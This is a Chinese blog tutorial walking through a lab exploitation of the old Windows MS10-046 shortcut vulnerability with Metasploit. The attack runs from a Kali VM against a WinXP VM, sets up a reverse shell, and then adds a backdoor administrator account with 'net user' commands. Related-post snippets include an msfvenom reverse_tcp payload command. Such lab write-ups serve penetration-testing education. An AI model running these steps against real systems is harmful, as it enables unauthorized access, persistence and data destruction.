Metasploit(msf)系列-利用快捷方式漏洞进行渗透提权

最新推荐文章于 2024-05-20 08:33:57 发布
最新推荐文章于 2024-05-20 08:33:57 发布
阅读量3.2k 收藏 13
点赞数 5
分类专栏: msf系列

原理:

       利用WinXP、Windows2000、Windows2003、Windows Vista等系统存在的漏洞Windows Shell中的漏洞可能允许远程执行代码,如果显示特制的快捷方式图标,则可能允许远程执行代码,成功利用此漏洞的攻击者拥有与本地用户相同的用户权限。

准备:

靶    机:VMware下的WinXP系统  IP:192.168.1.111

攻击主机:VMware下的Kali系统     IP:192.168.1.110

在WinXP系统中建立个共享文件夹,右击选择属性,点开共享,按下图设置

渗透提权过程:

Step1:进入metasploit

Step2:search寻找ms10_046攻击模块

Step3:使用第一个模块(use + 模块名称)

Step4:设置payload反弹

Step5:使用show options命令,查看需设置的参数

这里需要设置的是SRVHOST、LHOST

Step6:设置SRVHOST、LHOST参数

Step7:exploit生成链接

Step8:在WinXP系统访问\\192.168.1.110\BBsgRC\,就是访问共享文件夹

可以看出出现了两个快捷方式的文件

Step9:攻击成功

Step10:sessions -i 2,选择攻击模块

Step11:在WinXP系统中访问http://192.168.1.110:80/

Step12:攻击成功

Step13:sessions -i 3,选择攻击模块,shell进行提权

Step:14:net user查看WinXP系统用户

Step15:添加用户

net user test 789456123 /add

net localgroup Administrators test /add

Step16:查看test用户是否成功

之后就可以对该主机进行一些越权的操作了:可以对WinXP系统进行远程登录、可以在该主机放入木马文件、删除文件等。

chaojixiaojingang
关注
  • 5
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS10-046_LNK文件快捷方式漏洞的原理分析(多图杀猫)
GaA.Ra的自留地 in Csdn
06-10 1万+
文件快捷方式漏洞MS10-046是除了n年前的动画光标(.ani)漏洞之外另一个让我觉得比较有趣的漏洞,毕竟是本机执行任意代码的权限,当然,n年前我还只是一个菜鸟,神马都不懂.       入正题吧,欢迎拍砖,大家一起进步.(后面我会把一些参考文章贴出来的)       由于MS10-046的漏洞是在shell32.dll当中,windows出于美化的目的,会现实快捷方式的图标,这个图标可
MS10-046文件快捷方式漏洞复现与利用
sGanYu
11-07 4867
攻击机:kali 靶机:windows xp sp2 使用metasploit框架,需要启用metasploit所依赖的postgresql数据库 在kali上启动postgresql命令【systemctl start postgresql】 如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开 启动msfconsole 搜索ms10-046相应的模块 这里有两个可利用的模块,browser.
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
dzqxwzoe的博客
05-20 712
MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
lnk漏洞快捷方式漏洞)全面解析
weixin_34323858的博客
07-21 483
lnk漏洞快捷方式漏洞)全面解析 7月16日,Windows lnk漏洞快捷方式漏洞)的相关信息被披露,因为利用这个漏洞传播恶意软件具备“看一眼就中”的显著特性,立即引发安全厂商的高度关注。 本资料试图向公众完整解释与lnk漏洞快捷方式漏洞)有关的信息,提醒公众高度重视,尽早采取必要的防范措施。 lnk漏洞快捷方式漏洞)是什么? 在我们平时启动电脑上的程序时,很多情况下是先双击程序...
Metasploit拿到shell后 低权限---提权
qq_58000413的博客
08-24 1433
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。
渗透测试Metasploit框架体验(5.理解MSF渗透-之提权
weixin_51803729的博客
02-12 5207
渗透测试Metasploit框架体验(5.理解MSF渗透-之提权
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
Metasploit渗透测试指南完整版-pdf
07-23
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
0x19.第十九课 MetaSploit对cve-2019-0708的漏洞攻击复现.pdf
06-24
0x19.第十九课 MetaSploit对cve-2019-0708的漏洞攻击复现.pdf
kali linux msf系列视频教程
10-25
kali msf 系列 第四章利用快捷方式漏洞进行渗透提权 kali msf 系列 第五章利用PDF渗透提权 kali msf 系列 第六章爆破模块讲解 kali msf 系列 第七章木马生成 kali msf 系列 第八章木马免杀 kali msf 系列 第九章...
metasploit-framework-6.0.27
01-29
漏洞利用框架,Windows版本
Metasploit提权
weixin_51151498的博客
08-25 282
windows
MSF 内网渗透(案例)
热门推荐
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
metasploit linux 提权(本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。)
qq_73628117的博客
09-06 327
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
117.网络安全渗透测试—[权限提升篇15]—[Ubuntu15.04 Metasploit提权]
qwsn
07-08 3640
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。php马: elf马:#msfconsole,开启Metasploit控制台 如下图所示,我们首先上传shellx.php攻击载荷到靶机:
初学MSF渗透提权、免杀(上)
qq_53058639的博客
08-01 1658
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
Metasploit提权和后渗透
Kali与编程
12-04 1516
渗透技术包括提权、横向移动、持久化、数据窃取、漏洞利用等,攻击者可以利用这些技术和工具深入系统内部,并获取系统中的敏感信息、提高攻击者的权限、绕过防御措施等。在本文中,我将详细介绍Metasploit提权模块和技术,包括Windows和Linux系统下的提权模块和技术,以及如何使用Metasploit进行提权攻击。横向移动是指攻击者在入侵一个系统后,通过利用系统内部的漏洞或者获取其他用户的登录名和密码等方式,从一个系统进入另一个系统,进而攻击其他系统。
提权metasploit提权方法
孤桜懶契
08-22 811
前言 metasploit 提权使用 常用的提权模块 metasploit 提权EXP存储文件夹路径 find / -name metasploit 一般都在 /usr/share/metasploit-framework/modules/exploits/windows/local windows2003提权 环境:2003 server 1、生成攻击载荷 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lpo
一次授权任务的内网渗透 作者: 疯猫网络.pdf
04-08
一次授权任务的内网渗透 作者: 疯猫网络

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值